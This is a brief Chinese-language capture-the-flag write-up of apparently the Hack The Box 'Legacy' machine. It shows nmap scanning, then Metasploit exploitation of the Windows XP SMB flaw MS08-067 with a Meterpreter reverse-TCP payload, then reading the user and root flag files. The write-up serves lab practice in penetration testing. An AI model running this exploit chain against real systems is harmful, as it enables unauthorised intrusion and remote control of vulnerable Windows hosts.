文章目录
- [1 端口扫描](#1 端口扫描)
- [2 测试思路](#2 测试思路)
- [3 445端口漏洞测试](#3 445端口漏洞测试)
- [4 flag](#4 flag)
Legacy 测试过程
1 端口扫描
bash
nmap -sC -sV 10.129.227.181
![](https://file.jishuzhan.net/article/1774777294615744514/58e1c2c1abfd7789cce32f28e272eff2.webp)
2 测试思路
** 目标开启了135、139、445端口,445 SMB服务存在很多可利用漏洞,所以测试点先从445端口开始。而且在Nmap扫描结果中,可以看到系统是Windows XP,所以寻找Windows XP相关的SMB漏洞。**
3 445端口漏洞测试
** 1.搜索SMB服务相关漏洞
**
bash
nmap -p 445 --srcipt vuln 10.129.227.181
** 2.漏洞exploit
**
bash
search exploit/windows/smb
在输出中存在很多可利用exploit
bash
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhosts 10.129.227.181
set rport 445
run
![](https://file.jishuzhan.net/article/1774777294615744514/d222c9cbf674dc40bdc0a945fdf33964.webp)
![](https://file.jishuzhan.net/article/1774777294615744514/e0f05e226f60a4ea4abd513b0b23c0d2.webp)
4 flag
bash
type C:\Documents and Settings\john\Desktop\user.txt
type C:\Documents and Settings\Administrator\Desktop\root.txt
![](https://file.jishuzhan.net/article/1774777294615744514/e8b7bf8e6630ffd6ccd4a3c088a84ab4.webp)